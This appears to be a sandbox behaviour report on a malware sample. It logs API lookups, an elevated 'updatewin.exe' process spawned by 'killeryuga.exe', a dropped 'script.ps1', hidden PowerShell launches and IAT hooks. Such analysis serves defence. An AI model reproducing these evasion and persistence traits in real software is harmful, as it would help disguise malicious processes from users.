System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSListHead, address_out = 0x771694a4 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x76c41811 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74d514d6 True 1
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7537ad1a True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
System Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
System Get Time type = Performance Ctr, time = 18298853611 True 1
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Module Load module_name = kernel32, base_address = 0x0 False 1
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Module Load module_name = kernel32, base_address = 0x0 False 1
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Environment Get Environment String - True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1, size = 49 True 1
Process Create process_name = powershell, os_pid = 0xa4c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Process Create process_name = powershell, os_pid = 0xb04, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Process #11: updatewin.exe

Information Value
ID #11
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:15

OS Process Information
Information Value
PID 0xa18
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xA1C, 0xA70

Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x004F5000 0x004F5FFF Marked Executable - 32-bit - False
updatewin.exe 0x00400000 0x0044DFFF Forced - 32-bit - False

Hook Information
Type Installer Target Size Information Actions
IAT private_0x00000000004e0000:+0x16785 90. entry of updatewin.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x0000000000900000:+0x700000
IAT private_0x00000000004e0000:+0x16785 121. entry of updatewin.exe 4 bytes user32.dll:CallMsgFilterW+0x0 now points to pagefile_0x0000000000900000:+0x700000

Threads
Thread 0xa1c
Category Operation Information Success Count
System Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
System Get Time type = Ticks, time = 120198 True 1
System Get Time type = Performance Ctr, time = 18241963676 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 260 True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
System Get Time type = Ticks, time = 120229 True 1
System Get Time type = System Time True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
System Get Info type = Operating System True 1
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
